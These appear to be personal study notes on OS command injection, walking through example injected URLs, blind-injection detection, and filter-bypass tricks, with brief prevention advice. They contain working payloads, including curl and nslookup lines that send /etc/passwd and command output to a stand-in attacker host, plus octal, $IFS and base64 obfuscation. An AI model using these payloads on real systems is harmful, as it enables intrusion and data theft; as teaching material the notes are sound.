OS Command Injection notes
My notes about Command Injection
Category: [Server-Side]
Severity: [High to Critical]
Impact: [Data manipulation, System takeover, Privilege escalation, etc]
1. Concept
OS Command Injection also known as Shell Injection allows an attacker to execute an Operating System command on the server that is running an application.
2. Injecting OS Commands
Example, a shopping application lets the user view a product’s info using a query via a URL:
https://example.com/products?productId=31&storeId=12
in this case we imagine that the application runs a shell command to provide the product info:
./product.sh 31 12
This command find product information and return it to show it to the user, so attacker might use this to run an arbitrary command, for instance:
https://example.com/products?productId=31&storeId=12+&&+whoami
so the command will look like this:
./product.sh 31 12 && whoami
which is mean attacker runs the whoami command. However he can run whatever he want:
https://example.com/products?productId=31&storeId=12+&&+cat+/etc/passwd
./product.sh 31 12 && cat /etc/passwd
Or the attacker might use the productId to do this:
https://example.com/products?productId=31+|+whoami+|&storeId=12
./product.sh 31 | whoami | 12
which leads to run command whoami → sam (for example)
The system will shows something like this:
Product ID: 31
Store ID : 12
Name : Something
Price : 10$
...
sam
Or for the cat /etc/passwd command:
Product ID: 31
Store ID : 12
Name : Something
Price : 10$
...
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
...
3. Useful Commands
| Purpose of command | Linux | Windows |
|---|---|---|
| Name of current user | whoami | whoami |
| Operating system | uname -a | ver |
| Network configuration | ifconfig | ipconfig /all |
| Network connections | netstat -an | netstat -an |
| Running processes | ps -ef | tasklist |
4. Blind OS Command Injection
Example: a website let the users submit a feedback in a feedback form. The user enters an Email address and feedback message. the server-side application using a mail program to generate the feedback and send it to admin:
mail -s "This site is great" -a From:peter@normal-user.net feedback@example.com
In such a case, the output doesn’t return to the user and sent to the admin, so it’s impossible to see the response normally. In this situations, we can use a variety of techniques to detect and exploit vulnerability.
- Detecting blind OS Command injection using time delays
Some commands like ping need some times to execute and return the results, so it’s a good command to detect and confirm a command injection bug:
& ping -c 10 127.0.0.1 &
This command causes the application to ping its loopback network adapter for 10 seconds.
- Exploiting blind OS command injection by redirecting output
You can redirect the output from the injected command into a file within the document root and then read and retrieve it using the browser. For example, if the application serves static resources from the filesystem location /var/www/static, you can submit this input:
& whoami > /var/www/images/file.txt
You can then open https://example.com/file.txt to get the output.
- Exploiting blind OS command injection using out-of-band (OAST) techniques
You can use an injected command to interact with an out-of-band network and send the output to that server:
& nslookup $(whoami).web-attacker.com &
& nslookup `whoami`.web-attacker.com &
& dig TXT $(whoami).web-attacker.com &
& dig TXT `whoami`.web-attacker.com &
this causes a DNS record log in the server, so attacker can see the output of injected command (whoami) in a DNS query:
sam.web-attacker.com
Or over HTTP Protocol:
& whoami | curl -X POST -d @- web.attacker.com & → executes whoami
& curl -X POST -d "@/etc/passwd" web.attacker.com & → read /etc/passwd
5. Ways of injecting OS commands
&
&&
|
||
;
0x0a or %0a → new line
`injected command`
$(injected command)
%00 or \x00 → Null byte
You’ll also need " & ' to escape the quoted strings in the terminal.
6. Advanced bypasses
- Alphabet-less execution
ANSI-C Quoting: Using Octal numbers to execute a command
$'\154\163' → ls
$'\167\150\157\141\155\151' → whoami
Running several commands (using bash -c ...):
$'\142\141\163\150'\40$'\55\143'\40$'\167\150\157\141\155\151' → bash -c whoami
In sh which doesn’t support above syntaxes:
$(printf '\167\150\157\141\155\151') → whoami
- Separators filters
when < > $ & | ; are filtered:
127.0.0.1%0a<COMMAND> → %0a: URL-encoded of enter
cat$IFS/etc/passwd → Variable Expansion, $IFS is space, also ${IFS} or \40
{cat,/etc/passwd} → Brace Expansion (bash only)
cat</etc/passwd → Redirection Operators
/???/??? /???/?????? → /bin/cat /etc/passwd , Wildcard execution
- Base64 execution
echo "Y2F0IC9ldGMvcGFzc3dk" | base64 -d | sh → cat /etc/passwd
- IP address filters
when standard form of IP (X.X.X.X) is filtered:
- Octal:
0177.0000.0000.0001 - Decimal/DWORD:
2130706433 - Dotted format:
127.1
7. Prevent Command Injection
Most effective way: Never call an OS command to do something If you have to call an OS command using user-supplied input, perform a strong validation, example:
- Validating against a whitelist of permitted values.
- Validating that the input is a number.
- Validating that the input contains only alphanumeric characters, no other syntax or whitespace.